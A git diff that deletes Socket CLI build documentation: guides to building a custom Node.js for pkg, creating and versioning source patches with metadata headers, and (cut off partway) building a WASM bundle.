~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64* - -# If missing, build was incomplete -node scripts/build-yao-pkg-node.mjs --clean --verify - -# Verify it's in cache after build -ls -lh ~/.pkg-cache/v3.5/ -``` - -### pkg Build Fails: "SEA not detected" - -**Symptoms**: pkg binary runs but can't load embedded code - -**Fix**: -```bash -# Verify SEA modification was applied -node scripts/verify-node-build.mjs - -# Check the source file -cat .custom-node-build/node-yao-pkg/lib/sea.js | grep "isSea = () => true" - -# If not found, rebuild with clean flag -node scripts/build-yao-pkg-node.mjs --clean -``` - -## 📊 Build Time Estimates - -Based on CPU cores: - -| CPU Cores | Estimated Time | Range | -|-----------|----------------|-------| -| 2 cores | ~90 minutes | 75-110 min | -| 4 cores | ~75 minutes | 60-90 min | -| 8 cores | ~38 minutes | 30-46 min | -| 10 cores | ~30 minutes | 24-36 min | -| 12+ cores | ~25 minutes | 20-30 min | - -**Note**: First build is slower (downloads source). Subsequent builds are faster if source exists. - -## 🔐 Pre-flight Check Requirements - -Before building, ensure you have: - -- ✅ **Tools**: git, curl, patch, make, strip, codesign (macOS) -- ✅ **Disk Space**: At least 5GB free -- ✅ **Python**: Version 3.6 or later -- ✅ **Compiler**: clang++, g++, or c++ -- ✅ **Network**: Can reach GitHub and yao-pkg -- ✅ **Node.js Version**: Valid git tag exists - -**Check**: Script runs these checks automatically before building. - -## 📁 Important Directories - -``` -socket-cli/ -├── .custom-node-build/ # Build workspace -│ ├── node-yao-pkg/ # Node.js source (cloned) -│ ├── patches/ # Downloaded patches -│ │ └── node.v24.10.0.cpp.patch -│ ├── build.log # Build output log -│ └── .build-checkpoint # Progress checkpoint -│ -├── build/patches/socket/ # Socket-specific patches -│ ├── enable-sea-*.patch # SEA detection patches -│ └── fix-v8-*.patch # V8 include patches (v24.9.x only!) -│ -├── scripts/ -│ ├── build-yao-pkg-node.mjs # Main build script -│ ├── verify-node-build.mjs # Verification script -│ └── lib/ -│ ├── build-helpers.mjs # Helper functions -│ └── patch-validator.mjs # Patch validation -│ -└── docs/ - ├── node-patch-metadata.md # Patch format guide - └── technical/ - └── build-system-improvements.md -``` - -## 🎯 Build Flow Summary - -``` -1. Pre-flight Checks (30 seconds) - ✅ Tools, disk space, Python, compiler, network - -2. Download yao-pkg Patch (if needed) - ✅ Auto-retry up to 3 times - ✅ Integrity verification - -3. Validate yao-pkg Patch - ✅ Version compatibility - ✅ Content analysis - -4. Clone/Reset Node.js Source (2-5 minutes) - ✅ Git clone --depth 1 - -5. Validate Socket Patches - ✅ Metadata parsing - ✅ Version compatibility - ✅ Conflict detection - -6. Apply Patches - ✅ yao-pkg patches (V8 bytecode, PKG bootstrap) - ✅ Socket patches (SEA detection) - -7. Verify Modifications - ✅ Check SEA override applied - ✅ Check V8 includes correct - -8. Configure (2-5 minutes) - ✅ Optimization flags - -9. Build (30-90 minutes depending on CPU) - ✅ Make with parallel jobs - ✅ Log to build.log - -10. Smoke Test - ✅ --version check - ✅ Execute JavaScript - -11. Strip Debug Symbols (82MB → 54MB) - ✅ Smoke test after strip - -12. Code Sign (macOS ARM64 only) - ✅ Ad-hoc signing - -13. Install to Cache - ✅ Copy to ~/.pkg-cache/ - -14. Verify Build - ✅ 8-point verification (if --verify) - -15. Success! 🎉 -``` - -## 💡 Tips & Best Practices - -### 1. Always Use --clean for Major Changes - -```bash -# After updating Node.js version -# After modifying patches -# After build system changes -node scripts/build-yao-pkg-node.mjs --clean -``` - -### 2. Check Build Logs on Failure - -```bash -# Last 50 lines shown automatically -# Full log: -tail -f .custom-node-build/build.log # Monitor live -less .custom-node-build/build.log # Browse full log -grep -i error .custom-node-build/build.log # Find errors -``` - -### 3. Verify After Building - -```bash -# Quick verification -node scripts/verify-node-build.mjs - -# Full integration test -node scripts/test-yao-pkg-integration.mjs -``` - -### 4. Keep Cache Clean - -```bash -# Old builds accumulate, clean periodically: -rm -rf ~/.pkg-cache/v3.5/built-v24.9.* # Remove old versions -``` - -### 5. Use Existing Source When Possible - -```bash -# First build: Downloads source (slow) -node scripts/build-yao-pkg-node.mjs - -# Subsequent builds: Reuses source (faster) -node scripts/build-yao-pkg-node.mjs - -# Only use --clean when necessary -``` - -## 🔬 Advanced Debugging - -### Enable Debug Output - -```bash -# More verbose output (if implemented) -DEBUG=1 node scripts/build-yao-pkg-node.mjs -``` - -### Check Binary Dependencies - -```bash -# macOS: Check what libraries binary needs -otool -L ~/.pkg-cache/v3.5/built-v24.10.0-darwin-arm64 - -# Linux: Check library dependencies -ldd ~/.pkg-cache/v3.5/built-v24.10.0-linux-x64 -``` - -### Inspect Patch Metadata - -```bash -# See what a patch claims to support -head -20 build/patches/socket/enable-sea-*.patch - -# Should show: -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -``` - -### Test Binary in Isolation - -```bash -# Test the built binary directly -cd .custom-node-build/node-yao-pkg -./out/Release/node --version -./out/Release/node -e "console.log('Hello')" - -# Test SEA detection (should always be true) -./out/Release/node -e "console.log(require('node:sea').isSea())" -# Expected output: true -``` - -## 📚 Related Documentation - -- **[Build System Improvements](./technical/build-system-improvements.md)** - Complete technical overview -- **[Patch Metadata Format](./node-patch-metadata.md)** - How to write patches with metadata -- **[Build Improvements 2025-10-15](./technical/build-improvements-2025-10-15.md)** - Latest enhancements including test integration - -## 🆘 Getting Help - -### Check Documentation First - -1. This quick reference -2. Build system improvements doc -3. Patch metadata guide - -### Common Error Patterns - -- **"file not found"** → Check V8 patches (v24.10.0+ doesn't need them) -- **"tool not available"** → Install Xcode Command Line Tools -- **"version X doesn't exist"** → Check NODE_VERSION is valid git tag -- **"out of memory"** → Close applications, free up RAM -- **"disk full"** → Free up 5GB+ space - -### Still Stuck? - -1. Check build log: `.custom-node-build/build.log` -2. Try clean build: `node scripts/build-yao-pkg-node.mjs --clean` -3. Verify environment: Script runs pre-flight checks automatically -4. Check patch compatibility: Remove patches, let system use direct modifications - ---- - -**Last Updated**: 2025-10-15 -**Applies To**: Socket CLI v1.0.80+ diff --git a/docs/build/node-patch-creation-guide.md b/docs/build/node-patch-creation-guide.md deleted file mode 100644 index 8124e9ddf..000000000 --- a/docs/build/node-patch-creation-guide.md +++ /dev/null @@ -1,562 +0,0 @@ -# Node.js Patch Creation Guide - -Complete guide for creating, testing, and maintaining Node.js patches for the Socket CLI build system. - -## Overview - -This guide shows you how to: -1. Create new patches for Node.js modifications -2. Add proper metadata headers -3. Test patches before committing -4. Regenerate patches for new Node.js versions - -## When to Create Patches - -Create patches when: -- ✅ You need to modify Node.js source for a specific version -- ✅ The modifications are stable and repeatable -- ✅ You want to version-control the changes -- ✅ You need to share modifications with the team - -**Don't create patches** when: -- ❌ Modifications change frequently -- ❌ You're still experimenting -- ❌ Direct modifications are simpler - -## Quick Start - -```bash -# 1. Build Node.js with direct modifications -node scripts/build-yao-pkg-node.mjs --clean - -# 2. Generate patches from the modified source -node scripts/generate-node-patches.mjs --version=v24.10.0 - -# 3. Test the generated patches -node scripts/build-yao-pkg-node.mjs --clean --verify -``` - -## Step-by-Step: Creating a New Patch - -### Step 1: Start with Clean Source - -```bash -# Clean build directory -rm -rf .custom-node-build/node-yao-pkg/ - -# Clone fresh Node.js source -cd .custom-node-build -git clone --depth 1 --branch v24.10.0 https://github.com/nodejs/node.git node-yao-pkg -cd node-yao-pkg -``` - -### Step 2: Create a Git Branch - -```bash -# Create a branch for your changes -git checkout -b socket-modifications -``` - -### Step 3: Apply yao-pkg Patches First - -```bash -# Apply yao-pkg patches (infrastructure must be in place) -patch -p1 < ../.custom-node-build/patches/node.v24.10.0.cpp.patch -``` - -**Why?** Socket patches should be applied AFTER yao-pkg patches to avoid conflicts. - -### Step 4: Make Your Modifications - -Edit the files you need to modify. For example, to enable SEA detection: - -```bash -# Edit lib/sea.js -nano lib/sea.js -``` - -Make your changes: -```javascript -// Before: -const { isSea, getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); - -// After: -const isSea = () => true; -const { getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); -``` - -### Step 5: Commit Your Changes - -```bash -# Stage the changes -git add lib/sea.js - -# Commit with descriptive message -git commit -m "Enable SEA detection for pkg binaries" -``` - -### Step 6: Generate the Patch - -```bash -# Generate patch from the commit -git format-patch -1 HEAD - -# This creates: 0001-Enable-SEA-detection-for-pkg-binaries.patch -``` - -### Step 7: Add Metadata - -Open the generated patch and add metadata at the top: - -```patch -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -# @requires: yao-pkg-patches -# -# Overrides the isSea binding to always return true, making pkg binaries -# report as Single Executable Applications for consistency. -# -# This is required for pkg to properly detect and load embedded code. - -From abc123def456... Mon Sep 17 00:00:00 2001 -From: Your Name -Date: Mon, 15 Oct 2025 12:00:00 -0700 -Subject: [PATCH] Enable SEA detection for pkg binaries - ---- - lib/sea.js | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) - -diff --git a/lib/sea.js b/lib/sea.js -index 1234567..8901234 100644 ---- a/lib/sea.js -+++ b/lib/sea.js -@@ -3,7 +3,8 @@ const { - ArrayBufferPrototypeSlice, - } = primordials; - --const { isSea, getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); -+const isSea = () => true; -+const { getAsset: getAssetInternal, getAssetKeys: getAssetKeysInternal } = internalBinding('sea'); - const { TextDecoder } = require('internal/encoding'); - const { validateString } = require('internal/validators'); - const { --- -2.39.0 -``` - -### Step 8: Name and Move the Patch - -```bash -# Rename with descriptive name -mv 0001-Enable-SEA-detection-for-pkg-binaries.patch \ - enable-sea-for-pkg-binaries-v24-10-0.patch - -# Move to Socket patches directory -mv enable-sea-for-pkg-binaries-v24-10-0.patch \ - ../../build/patches/socket/ -``` - -### Step 9: Test the Patch - -```bash -# Clean and rebuild using the patch -cd ../.. -node scripts/build-yao-pkg-node.mjs --clean -``` - -**Expected output**: -``` -Validating Socket Patches -Found 1 patch(es) for v24.10.0 -Checking integrity, compatibility, and conflicts... - -Validating enable-sea-for-pkg-binaries-v24-10-0.patch... - 📝 Enable SEA detection for pkg binaries - ✓ Modifies SEA detection - ✅ Valid - -✅ All Socket patches validated successfully -✅ No conflicts detected - -Testing Socket Patch Application -Running dry-run to ensure patches will apply cleanly... - -Testing enable-sea-for-pkg-binaries-v24-10-0.patch... - ✅ Will apply cleanly - -Applying Socket Patches -Applying enable-sea-for-pkg-binaries-v24-10-0.patch... -✅ enable-sea-for-pkg-binaries-v24-10-0.patch applied -``` - -### Step 10: Verify the Build - -```bash -# Verify the modifications were applied correctly -node scripts/verify-node-build.mjs -``` - -### Step 11: Commit the Patch - -```bash -# Add the patch to version control -git add build/patches/socket/enable-sea-for-pkg-binaries-v24-10-0.patch -git commit -m "Add SEA detection patch for Node.js v24.10.0" -``` - -## Patch Naming Conventions - -### Format - -``` ---.patch -``` - -### Examples - -```bash -# Good names: -enable-sea-for-pkg-binaries-v24-10-0.patch -fix-v8-include-paths-v24-9-0.patch -remove-deprecated-api-v24-10-0.patch - -# Bad names: -patch1.patch -my-fix.patch -node-modifications.patch -``` - -### Version Patterns - -```bash -# Specific version -enable-sea-v24-10-0.patch # Only v24.10.0 - -# Version range (generic) -enable-sea-v24.patch # All v24.x.x -``` - -**Best practice**: Use specific version numbers for clarity. - -## Metadata Reference - -### Required Fields - -```patch -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -``` - -### Optional Fields - -```patch -# @requires: yao-pkg-patches -# @conflicts: alternative-sea-patch -``` - -### Example: Complete Metadata - -```patch -# @node-versions: v24.10.0, v24.10.1, v24.10.2 -# @description: Enable SEA detection for pkg binaries -# @requires: yao-pkg-patches -# @conflicts: alternative-sea-implementation -# -# Long-form description: -# This patch modifies lib/sea.js to always return true for isSea() -# enabling pkg binaries to use Node.js SEA APIs correctly. -# -# The modification is required because pkg needs to detect when -# running as a single executable application. -``` - -## Testing Patches - -### Manual Testing - -```bash -# Test patch application (dry-run) -cd .custom-node-build/node-yao-pkg -patch -p1 --dry-run < ../../build/patches/socket/your-patch.patch - -# If successful, apply it -patch -p1 < ../../build/patches/socket/your-patch.patch -``` - -### Automated Testing - -```bash -# Run full build with verification -node scripts/build-yao-pkg-node.mjs --clean --verify - -# Run integration test -node scripts/test-yao-pkg-integration.mjs -``` - -### Validation Testing - -```bash -# Test patch validator -node -e " -import { validatePatch } from './scripts/lib/patch-validator.mjs'; -const result = await validatePatch( - 'build/patches/socket/your-patch.patch', - 'v24.10.0' -); -console.log(result); -" -``` - -## Regenerating Patches for New Versions - -When a new Node.js version is released: - -### Option 1: Automatic Regeneration - -```bash -# Try applying existing patches to new version -node scripts/build-yao-pkg-node.mjs --version=v24.11.0 --clean - -# If it fails, regenerate: -node scripts/regenerate-node-patches.mjs --version=v24.11.0 -``` - -### Option 2: Manual Regeneration - -```bash -# 1. Clone new Node.js version -cd .custom-node-build -rm -rf node-yao-pkg -git clone --depth 1 --branch v24.11.0 https://github.com/nodejs/node.git node-yao-pkg -cd node-yao-pkg - -# 2. Apply yao-pkg patches -patch -p1 < ../patches/node.v24.11.0.cpp.patch - -# 3. Make your modifications again -# (Edit files as needed) - -# 4. Generate new patches -git add . -git commit -m "Socket modifications for v24.11.0" -git format-patch -1 HEAD - -# 5. Add metadata and move to patches directory -mv 0001-*.patch ../../build/patches/socket/enable-sea-v24-11-0.patch -``` - -## Common Scenarios - -### Scenario 1: Modify Single File - -**Goal**: Change one JavaScript file - -**Steps**: -1. Edit the file -2. `git add ` -3. `git commit -m "Description"` -4. `git format-patch -1 HEAD` -5. Add metadata -6. Move to patches directory - -### Scenario 2: Modify Multiple Files - -**Goal**: Change several files in one patch - -**Steps**: -1. Edit all files -2. `git add ` -3. `git commit -m "Description"` -4. `git format-patch -1 HEAD` -5. Add metadata -6. Move to patches directory - -### Scenario 3: Multiple Independent Changes - -**Goal**: Create separate patches for different concerns - -**Steps**: -1. Edit first set of files -2. `git add ` -3. `git commit -m "First change"` -4. Edit second set of files -5. `git add ` -6. `git commit -m "Second change"` -7. `git format-patch -2 HEAD` (creates 2 patches) -8. Add metadata to both -9. Move both to patches directory - -### Scenario 4: Update Existing Patch - -**Goal**: Fix an existing patch - -**Steps**: -1. Start fresh: `rm -rf .custom-node-build/node-yao-pkg` -2. Clone and apply yao-pkg patches -3. Make the CORRECTED modifications -4. Generate new patch -5. Replace old patch file - -## Troubleshooting - -### Patch Won't Apply - -**Symptoms**: -``` -File to patch: -``` - -**Causes**: -- Wrong strip level (`-p0` vs `-p1`) -- Context doesn't match Node.js version -- File structure changed - -**Fix**: -```bash -# Try different strip level -patch -p0 < patch.patch # For paths without a/ b/ -patch -p1 < patch.patch # For Git-format paths - -# Check patch context -head -50 patch.patch # See what line numbers it expects - -# Regenerate for correct version -``` - -### Validation Fails - -**Symptoms**: -``` -❌ INVALID: Patch supports v24.9.0 but you're using v24.10.0 -``` - -**Fix**: -```patch -# Update @node-versions in patch header -# @node-versions: v24.9.0, v24.10.0 -``` - -### Conflicts with Other Patches - -**Symptoms**: -``` -⚠️ WARNING: Multiple patches modify lib/sea.js -``` - -**Fix**: -- Combine patches into one -- Or mark as conflicting: -```patch -# @conflicts: other-patch-name -``` - -### Dry-Run Fails - -**Symptoms**: -``` -❌ Cannot apply: Patch dry-run failed with exit code 1 -``` - -**Fix**: -```bash -# Check patch manually -cd .custom-node-build/node-yao-pkg -patch -p1 --dry-run < ../../build/patches/socket/your-patch.patch - -# See specific errors -# Regenerate if needed -``` - -## Best Practices - -### DO - -- ✅ **Test thoroughly** - Always test patches with `--clean` build -- ✅ **Add clear metadata** - Version requirements, description, dependencies -- ✅ **Use descriptive names** - `enable-sea-v24-10-0.patch`, not `patch1.patch` -- ✅ **Keep patches focused** - One concern per patch when possible -- ✅ **Document why** - Explain the purpose in metadata -- ✅ **Version patches** - Include Node.js version in filename - -### DON'T - -- ❌ **Don't skip metadata** - Always include `@node-versions` and `@description` -- ❌ **Don't guess versions** - Test patches on actual Node.js versions -- ❌ **Don't mix concerns** - Don't combine unrelated changes in one patch -- ❌ **Don't use wildcards loosely** - `v24+` might break on v25.0.0 -- ❌ **Don't forget to test** - Always verify patches apply and build succeeds - -## Automation Scripts - -### Generate Patches Script - -Create `scripts/generate-node-patches.mjs`: - -```javascript -#!/usr/bin/env node - -import { join } from 'node:path' -import { spawn } from '@socketsecurity/registry/lib/spawn' - -const NODE_VERSION = process.argv[2] || 'v24.10.0' -const SOURCE_DIR = join(process.cwd(), '.custom-node-build', 'node-yao-pkg') -const PATCHES_DIR = join(process.cwd(), 'build', 'patches', 'socket') - -console.log(`Generating patches for ${NODE_VERSION}...`) - -// Generate patches from git commits -const result = await spawn('git', ['format-patch', '-o', PATCHES_DIR, 'HEAD~1..HEAD'], { - cwd: SOURCE_DIR, - stdio: 'pipe', -}) - -if (result.code !== 0) { - console.error('Failed to generate patches') - process.exit(1) -} - -console.log(`✅ Patches generated in ${PATCHES_DIR}`) -console.log('📝 Don't forget to add metadata headers!') -``` - -## Quick Reference - -```bash -# Create branch -git checkout -b modifications - -# Apply yao-pkg patches -patch -p1 < yao-patch.patch - -# Make changes -edit files... - -# Commit -git add . -git commit -m "Description" - -# Generate patch -git format-patch -1 HEAD - -# Add metadata (edit file) -nano 0001-*.patch - -# Rename and move -mv 0001-*.patch enable-sea-v24-10-0.patch -mv enable-sea-v24-10-0.patch ../../build/patches/socket/ - -# Test -node scripts/build-yao-pkg-node.mjs --clean --verify -``` - -## Related Documentation - -- **[Patch Metadata Format](./node-patch-metadata.md)** - Metadata specification -- **[Build System](./technical/build-system-improvements.md)** - Build system overview -- **[Quick Reference](./node-build-quick-reference.md)** - Troubleshooting guide - ---- - -**Last Updated**: 2025-10-15 -**Applies To**: Socket CLI v1.0.80+ diff --git a/docs/build/node-patch-metadata.md b/docs/build/node-patch-metadata.md deleted file mode 100644 index f6ec55c83..000000000 --- a/docs/build/node-patch-metadata.md +++ /dev/null @@ -1,342 +0,0 @@ -# Node.js Patch Metadata Format - -This document describes the metadata format used in Node.js patches for the Socket CLI build system. - -## Overview - -Patches can include metadata in header comments to help the build system validate compatibility, detect conflicts, and provide better error messages. - -## Metadata Format - -Metadata is specified in comments at the **beginning of the patch file** using special directives: - -```patch -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -# @requires: yao-pkg-patches -# @conflicts: alternative-sea-patch -# -# This patch modifies lib/sea.js to always return true for isSea() -# enabling pkg binaries to use Node.js SEA APIs. -# -diff --git a/lib/sea.js b/lib/sea.js -... -``` - -## Metadata Directives - -### `@node-versions` - -**Purpose**: Specify which Node.js versions the patch is compatible with. - -**Format**: Comma-separated list of version specifiers. - -**Version Specifiers**: -- **Exact version**: `v24.10.0` - Only this version -- **Version range**: `v24.9.0-v24.9.5` - Inclusive range -- **Version and above**: `v24.10.0+` - This version and all later versions - -**Examples**: -```patch -# Single version -# @node-versions: v24.10.0 - -# Multiple specific versions -# @node-versions: v24.10.0, v24.10.1, v24.10.2 - -# Version range -# @node-versions: v24.9.0-v24.9.5 - -# Version and above -# @node-versions: v24.10.0+ - -# Complex specification -# @node-versions: v24.9.0-v24.9.5, v24.10.0+ -``` - -**Validation**: -- If `@node-versions` is present, the patch will only be applied to matching Node.js versions -- If omitted, the patch is assumed compatible with all versions (use with caution!) - -### `@description` - -**Purpose**: Brief description of what the patch does. - -**Format**: Single-line text description. - -**Examples**: -```patch -# @description: Enable SEA detection for pkg binaries -# @description: Fix V8 include paths for v24.9.0 build -# @description: Remove deprecated API usage -``` - -**Usage**: -- Displayed during patch validation -- Helps users understand what the patch does -- Keep it concise (one line) - -### `@requires` - -**Purpose**: List other patches or conditions that must be satisfied. - -**Format**: Comma-separated list of dependency names. - -**Examples**: -```patch -# Single dependency -# @requires: yao-pkg-patches - -# Multiple dependencies -# @requires: yao-pkg-patches, socket-base-modifications -``` - -**Validation**: -- Build system warns if required patches are missing -- Helps ensure patches are applied in correct order - -### `@conflicts` - -**Purpose**: List patches that conflict with this one. - -**Format**: Comma-separated list of conflicting patch names. - -**Examples**: -```patch -# Single conflict -# @conflicts: alternative-sea-implementation - -# Multiple conflicts -# @conflicts: old-v8-fix, deprecated-sea-patch -``` - -**Validation**: -- Build system errors if conflicting patches are present -- Prevents incompatible patches from being applied together - -## Complete Examples - -### Example 1: SEA Detection Patch - -```patch -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -# @requires: yao-pkg-patches -# -# This patch modifies lib/sea.js to always return true for isSea() -# which enables pkg binaries to use Node.js Single Executable Application APIs. -# -# The yao-pkg fork requires this modification to properly detect and handle -# embedded JavaScript code in single-file executables. -# -diff --git a/lib/sea.js b/lib/sea.js -index 1234567..8901234 100644 ---- lib/sea.js -+++ lib/sea.js -@@ -1,7 +1,8 @@ - 'use strict'; - const { - ArrayBufferPrototypeSlice, - } = primordials; - --const { isSea, getAsset: getAssetInternal } = internalBinding('sea'); -+const isSea = () => true; -+const { getAsset: getAssetInternal } = internalBinding('sea'); -``` - -### Example 2: V8 Include Path Fix (Version-Specific) - -```patch -# @node-versions: v24.9.0-v24.9.5 -# @description: Fix V8 include paths for v24.9.0 build -# @conflicts: v24.10.0-patches -# -# Node.js v24.9.x has incorrect V8 include paths that cause build failures. -# This patch removes the "src/" prefix from V8 internal includes. -# -# IMPORTANT: Do NOT use this patch with v24.10.0+ - those versions have -# correct include paths already! -# -diff --git a/deps/v8/src/heap/cppgc/heap-page.h b/deps/v8/src/heap/cppgc/heap-page.h -index 1234567..8901234 100644 ---- deps/v8/src/heap/cppgc/heap-page.h -+++ deps/v8/src/heap/cppgc/heap-page.h -@@ -9,7 +9,7 @@ - #include - #include - --#include "src/base/iterator.h" -+#include "base/iterator.h" -``` - -### Example 3: Combined Modifications - -```patch -# @node-versions: v24.10.0+ -# @description: Socket CLI Node.js modifications for pkg support -# @requires: yao-pkg-patches -# -# Combined patch that applies all Socket CLI modifications: -# 1. Enable SEA detection (lib/sea.js) -# 2. Remove deprecated APIs -# 3. Configure for minimal binary size -# -diff --git a/lib/sea.js b/lib/sea.js -... -diff --git a/lib/internal/bootstrap/node.js b/lib/internal/bootstrap/node.js -... -``` - -## Best Practices - -### 1. Always Specify Version Compatibility - -```patch -# ✅ GOOD: Explicit version specification -# @node-versions: v24.10.0+ - -# ❌ BAD: No version specification (assumes all versions work) -``` - -### 2. Use Descriptive Names - -```patch -# ✅ GOOD: Clear description -# @description: Enable SEA detection for pkg binaries - -# ❌ BAD: Vague description -# @description: Fix stuff -``` - -### 3. Document Conflicts - -```patch -# ✅ GOOD: Explicitly mark conflicts -# @node-versions: v24.9.0-v24.9.5 -# @conflicts: v24.10.0-patches -# @description: Fix V8 includes (v24.9.x only) - -# ❌ BAD: No conflict information -# Could be applied with v24.10.0 patches, causing build failure -``` - -### 4. Include Context in Comments - -```patch -# ✅ GOOD: Explain why the patch is needed -# @node-versions: v24.10.0+ -# @description: Enable SEA detection for pkg binaries -# -# This patch is required because pkg needs to detect when running -# as a single executable application. The yao-pkg fork expects -# isSea() to return true in all pkg-built binaries. -# -# Without this patch, pkg binaries will fail to load embedded code. - -# ❌ BAD: No context -# @node-versions: v24.10.0+ -# @description: Change isSea -``` - -### 5. Test Version Ranges Carefully - -```patch -# ✅ GOOD: Tested on specific versions -# @node-versions: v24.10.0, v24.10.1 -# @description: Enable SEA detection - -# ⚠️ CAUTION: Broad version range (test thoroughly!) -# @node-versions: v24.10.0+ -# @description: Enable SEA detection -``` - -## Validation Flow - -When you run the build script, patch validation happens in this order: - -1. **File Integrity Check** - - Verify patch file is not empty - - Verify patch file is not an HTML error page - - Verify patch contains diff markers - -2. **Metadata Parsing** - - Extract `@node-versions`, `@description`, `@requires`, `@conflicts` - - Parse version specifiers - -3. **Version Compatibility Check** - - Compare Node.js version against `@node-versions` - - Reject patch if version doesn't match - -4. **Content Analysis** - - Detect what files the patch modifies - - Detect V8 include modifications - - Detect SEA modifications - -5. **Conflict Detection** - - Check if multiple patches modify same files - - Check if patches have conflicting `@conflicts` declarations - - Check if patches are compatible with Node.js version - -6. **Application** - - Apply patches in order if all validation passes - - Fall back to direct modifications if patches fail - -## Error Messages - -### Version Incompatibility - -``` -❌ INVALID: Patch supports v24.9.0-v24.9.5 but you're using v24.10.0 -``` - -**Fix**: Use a patch compatible with your Node.js version. - -### Corrupted Patch - -``` -❌ INVALID: Patch file contains HTML (probably download error) -``` - -**Fix**: Re-download the patch file. - -### Patch Conflicts - -``` -❌ ERROR: Patches modify V8 includes but v24.10.0 doesn't need this fix -``` - -**Fix**: Remove incompatible V8 patches for v24.10.0+. - -## Advanced: Programmatic Validation - -You can validate patches programmatically using the patch validator: - -```javascript -import { validatePatch, analyzePatchContent } from './scripts/lib/patch-validator.mjs' - -// Validate a patch -const validation = await validatePatch('path/to/patch.patch', 'v24.10.0') -if (!validation.valid) { - console.error(`Invalid: ${validation.reason}`) -} else { - console.log(`Valid: ${validation.metadata.description}`) -} - -// Analyze patch content -const content = await readFile('patch.patch', 'utf8') -const analysis = analyzePatchContent(content) -console.log(`Modifies ${analysis.modifiesFiles.length} files`) -console.log(`V8 includes: ${analysis.modifiesV8Includes}`) -console.log(`SEA detection: ${analysis.modifiesSEA}`) -``` - -## Related Documentation - -- [Build System Improvements](./technical/build-system-improvements.md) - Complete build system documentation -- [Patch Implementation Plan](./socket-patch-implementation-plan.md) - Original patch system design -- [Node.js Patch Progress](./socket-patch-progress.md) - Patch development history - ---- - -**Last Updated**: 2025-10-15 -**Applies To**: Socket CLI v1.0.80+ diff --git a/docs/build/wasm-build-guide.md b/docs/build/wasm-build-guide.md deleted file mode 100644 index b203bcfc5..000000000 --- a/docs/build/wasm-build-guide.md +++ /dev/null @@ -1,352 +0,0 @@ -# WASM Build Guide - -Quick reference for building and optimizing Socket CLI's WASM bundle. - ---- - -## Quick Start - -### Production Build - -```bash -# Full optimized build (~5-10 minutes) -node scripts/wasm/build-unified-wasm.mjs - -# Or via CLI wrapper -node scripts/wasm.mjs --build -``` - -### Fast Dev Build (3-5x Faster) - -```bash -# Minimal optimization, fast iteration (~2-5 minutes) -node scripts/wasm/build-unified-wasm.mjs --dev - -# Or via CLI wrapper -node scripts/wasm.mjs --build --dev -``` - ---- - -## Build Modes Comparison - -| Mode | Build Time | Size | Use Case | -|------|------------|------|----------| -| **Dev** | 2-5 min | ~108-110 MB | Rapid iteration, testing | -| **Production** | 5-10 min | ~108-110 MB | Release, deployment | - -Both modes produce similar final sizes due to symbol stripping, but production has better runtime performance. - ---- - -## Optimization Levels - -### Dev Build (`--dev`) - -**Cargo Profile**: `dev-wasm` - -```toml -opt-level = 1 # Minimal optimization -lto = false # No link-time optimization -codegen-units = 16 # Parallel compilation (faster) -strip = true # Strip symbols (smaller) -``` - -**RUSTFLAGS**: -```bash --C target-feature=+simd128 # Enable WASM SIMD -``` - -### Production Build (default) - -**Cargo Profile**: `release` - -```toml -opt-level = "z" # Maximum size optimization -lto = "thin" # Thin link-time optimization -codegen-units = 1 # Single unit (best optimization) -strip = true # Strip symbols -panic = "abort" # No unwinding code -``` - -**RUSTFLAGS**: -```bash --C target-feature=+simd128 # Enable WASM SIMD --C link-arg=--strip-debug # Strip debug info --C link-arg=--strip-all # Strip all symbols -``` - ---- - -## Performance Optimizations - -### 1. Build Caching (Optional but Recommended) - -Install sccache for 40-60% faster clean builds: - -```bash -# Install -cargo install sccache - -# Configure environment -export RUSTC_WRAPPER=sccache -export SCCACHE_DIR=$HOME/.cache/sccache - -# Check cache stats -sccache --show-stats -``` - -### 2. Auto-Setup Environment - -```bash -# Interactive setup -node scripts/wasm/setup-build-env.mjs - -# Apply to shell -eval "$(node scripts/wasm/setup-build-env.mjs --export)" - -# Or append to shell config -node scripts/wasm/setup-build-env.mjs --export >> ~/.zshrc -source ~/.zshrc -``` - -### 3. Parallel Builds - -Ensure cargo uses all CPU cores: - -```bash -export CARGO_BUILD_JOBS=$(nproc) # Linux -export CARGO_BUILD_JOBS=$(sysctl -n hw.ncpu) # macOS -``` - ---- - -## Benchmarking - -Compare dev vs production build times: - -```bash -# Benchmark both modes -node scripts/wasm/benchmark-build.mjs - -# Benchmark dev only -node scripts/wasm/benchmark-build.mjs --dev-only - -# Benchmark production only -node scripts/wasm/benchmark-build.mjs --prod-only -``` - -**Expected Output**: -``` -Build Time Comparison: - Dev Build: 2m 30s - Prod Build: 8m 15s - Speedup: 3.3x faster (dev vs prod) -``` - ---- - -## Build Pipeline - -The build process consists of these steps: - -1. **Check Rust toolchain** - Install if missing -2. **Download models** - CodeT5, MiniLM, ONNX Runtime, Yoga -3. **Convert models** - INT4 quantization for CodeT5 -4. **Build WASM** - Rust → WASM compilation -5. **Optimize WASM** - wasm-opt -Oz (5-15% reduction) -6. **Compress** - Brotli quality 11 (~70% reduction) -7. **Embed** - Base64 encode into JavaScript - ---- - -## Size Breakdown - -### Before Compression - -| Component | Size | -|-----------|------| -| MiniLM model (INT8) | ~17 MB | -| CodeT5 encoder (INT4) | ~30 MB | -| CodeT5 decoder (INT4) | ~60 MB | -| Tokenizers | ~1 MB | -| ONNX Runtime | ~2-5 MB | -| Yoga Layout | ~95 KB | -| **Total** | **~115 MB** | - -### After Optimization - -| Stage | Size | Reduction | -|-------|------|-----------| -| Raw WASM | ~115 MB | baseline | -| wasm-opt -Oz | ~108-110 MB | 5-10% | -| Brotli (quality 11) | ~32-35 MB | ~70% | - ---- - -## Troubleshooting - -### Build is slow - -1. **Use dev mode for iteration**: - ```bash - node scripts/wasm/build-unified-wasm.mjs --dev - ``` - -2. **Install sccache**: - ```bash - cargo install sccache - export RUSTC_WRAPPER=sccache - ``` - -3. **Check CPU 